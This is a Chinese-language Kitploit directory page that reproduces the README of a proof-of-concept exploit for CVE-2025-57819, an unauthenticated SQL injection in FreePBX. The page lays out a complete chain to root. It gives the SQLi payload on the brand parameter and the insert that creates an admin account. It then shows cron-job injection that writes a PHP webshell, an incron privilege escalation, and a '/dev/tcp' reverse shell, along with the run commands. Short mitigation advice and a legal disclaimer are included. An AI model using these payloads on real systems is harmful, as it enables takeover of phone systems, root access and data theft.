Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FreePBX-SQLi-RCE — CVE-2025-57819 FreePBX SQLi RCE PoC | Kitploit
工具/GitHubGitHub/jazztherabbit/freepbx-sqli-rce
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubjazztherabbit/freepbx-sqli-rce

FreePBX-SQLi-RCE

CVE-2025-57819 FreePBX SQLi RCE PoC

查看仓库
42个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

FreePBX CVE-2025-57819 - 未授权 SQLi到RCE PoC

Python License

仅供教育与安全研究使用 - 请参见下方的法律声明

针对FreePBX中CVE-2025-57819(一个关键的未授权SQL注入漏洞)的利用概念验证,该漏洞可实现远程代码执行。本PoC在 官方补丁发布后 发布,仅用于安全研究和授权测试。

概述

FreePBX 15.x、16.x 和 17.x(低于补丁版本的版本)在端点的AJAX处理程序中存在未授权SQL注入漏洞。此漏洞链可实现:

  1. 通过SQL注入创建管理员账户
  2. 通过经过认证的cron任务注入部署Webshell
  3. (若incron可用)通过sysadmin_manager钩子链提权至root
  4. 通过反弹Shell进行全面系统控制

漏洞详情

CVE IDCVE-2025-57819
类型未授权SQL注入(基于错误)
CVSS9.8 / 10.0(严重)
受影响版本FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
已修补版本15.0.66, 16.0.89, 17.0.3+
CISA KEV是(2025年8月29日)

脆弱端点

root@kitploit:~
GET /admin/ajax.php?brand=<PAYLOAD>

端点模块的AJAX处理程序中的 brand 参数接受用户输入且未进行验证,导致基于错误的SQL注入。


利用链

阶段1:SQL注入与管理员账户创建

使用 EXTRACTVALUE() 基于错误的提取验证SQLi,泄露数据库名称:

root@kitploit:~
x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

向 asterisk.ampusers 插入新的管理用户:

root@kitploit:~
INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

阶段2:经过认证的Cron任务注入

获得有效的管理凭据后,该漏洞利用程序对FreePBX进行身份验证并建立经过认证的会话。保存会话cookie,用于所有后续认证请求。

将webshell命令注入 asterisk.cron_jobs:

root@kitploit:~
INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

FreePBX的cron运行器以 asterisk 用户身份执行该命令,部署PHP webshell。

阶段3:Webshell激活

PHP webshell被部署到 /var/www/html/shell.php:

root@kitploit:~
<?php system($_GET['cmd']); ?>

漏洞利用程序轮询webshell直到激活,从而以 asterisk 用户身份(uid=999)获得RCE。

阶段4:提权(有条件)

如果目标上配置了incron:

  1. 在 /var/spool/asterisk/incron/ 创建触发器文件
  2. incrond(以root身份运行)检测到文件创建
  3. 使用触发器文件名调用 /usr/bin/sysadmin_manager
  4. sysadmin_manager 验证GPG签名并分派到fwconsole-commands钩子
  5. 钩子解码payload并执行:/usr/sbin/fwconsole <COMMAND>
  6. 命令注入:help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

结果:反向监听器上获得root shell(若incron可用)。


滥用点

  • brand 参数无输入验证
  • 支持堆叠查询,可操纵数据库
  • 可写的 asterisk.cron_jobs 表以asterisk用户身份执行命令
  • 通过创建的管理员账户的cookie维持经过认证的会话
  • 以root身份运行的incron文件系统监控
  • 未经验证的fwconsole钩子执行,存在命令注入

安装

root@kitploit:~
git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

使用

root@kitploit:~
# 设置Netcat监听器
nc -lvnp <监听端口>

# 运行漏洞利用程序
python3 JTR-CVE-2025-57819.py <目标IP> <你的IP> <端口>

PoC

PoC截图


受影响版本

版本

缓解措施

立即:

  • 限制来自不受信任网络的 /admin/ajax.php 访问
  • 如果不需要,禁用incron:systemctl disable incrond

永久: 升级至已修补版本:15.0.66+、16.0.89+ 或 17.0.3+


参考

  • CVE-2025-57819
  • CISA KEV Catalog
  • FreePBX Security Advisory

法律声明

⚠️ 免责声明

此概念验证 仅供授权安全测试和教育目的使用。作者对因滥用或使用本工具造成的任何损害不承担任何责任。

你必须遵守:

  • 《计算机欺诈和滥用法案》(CFAA)及您所在司法管辖区的等效法律
  • 仅测试您拥有或已获得明确书面授权进行测试的系统
  • 在任何安全测试前获得书面许可
  • 负责任披露实践
  • 隐私和数据保护法规(GDPR、CCPA等)

禁止用途:

  • 未经授权访问计算机系统
  • 未经书面同意的渗透测试
  • 破坏服务或窃取数据
  • 任何恶意或非法活动

责任豁免: 作者对以下情况不承担责任:

  • 未经授权的访问或刑事指控
  • 系统损坏或数据丢失
  • 误用的法律后果
  • 违反计算机欺诈法律

此漏洞已:

  • 公开披露(CVE-2025-57819)
  • 补丁公开可用
  • 仅出于安全研究目的发布
  • 在补丁发布后负责任地分享

作者

JazzTheRabbit

  • GitHub:@JazzTheRabbit
  • HackTheBox:@JazzTheRabbit
  • YouTube:JazzTheRabbit

许可证

MIT License

下载工具
状态
15.0.0 – 15.0.65存在漏洞
15.0.66+已修补
16.0.0 – 16.0.88存在漏洞
16.0.89+已修补
17.0.0 – 17.0.2存在漏洞
17.0.3+已修补